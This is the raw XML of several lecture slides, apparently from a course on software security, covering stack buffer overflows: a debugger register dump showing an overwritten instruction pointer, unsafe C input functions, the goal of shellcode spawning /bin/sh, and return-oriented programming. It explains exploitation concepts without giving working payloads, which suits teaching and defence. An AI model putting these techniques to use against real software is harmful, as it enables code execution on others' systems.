                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd1fc  -11780</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x8048521	 134513953</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x908ff4	 9474036</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd210	 0xffffd210</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x6c6c6166	 0x6c6c6166</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x31303220	 0x31303220e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="687586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6">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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Overflowing” Functions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gets() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- note that data cannot contain newlines or EOFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and also custom input routines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204473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01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01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01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01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01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60" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to Exploit a Stack Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you can control %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you can turn that into arbitrary code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different variations to accommodate different architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux buffer overflows for 32-bit architectures explained in the paper “Smashing The Stack For Fun And Profit” by Aleph One, published on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 49(7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420435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146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146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14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14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14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146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Shellcode Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to execute arbitrary code in the vulnerable application's process space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This code has the same privileges as the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the standard term for this type of code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Called shellcode because classic example is code to execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Really just assembly code to perform specific purpose</a:t>
            </a:r>
          </a:p>
          <a:p>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167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1140498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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> approach can be generalized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of invoking whole functions, one can invoke just a snippet of code, followed by ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This technique was first introduced in 2005 to work around 64-bit architectures that require parameters to be passed using registers (the “borrowed chunks” technique, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Krahmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2070168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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later, the most general ROP technique was proposed, which supports loops and conditionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: “The Geometry of Innocent Flesh on the Bone: Return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without Function Calls (on the x86)”, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hovav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shacham</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our thesis: In any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able, by means of the return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> techniques we introduce, to cause the exploited program to undertake arbitrary computation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1941985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1474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The x86 CPU Family</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8088, 8086: 16 bit registers, real-mode only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80286: 16-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80386: 32-bit registers, 32-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80486/Pentium/Pentium Pro: Adds few features, speed-up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium MMX: Introduces the multimedia extensions (MMX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium II: Pentium Pro with MMX instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium III: Speed-up, introduces the Streaming SIMD Extensions (SSE) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium 4: Introduces the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetBurst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Xeon: Introduces Hyper-Threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: Multiple cores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMD Opteron: 64 bit architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8362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14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14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14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14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0147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0147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0147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0147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0147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0147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0147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953" y="305134"/>
            <a:ext cx="4840977" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
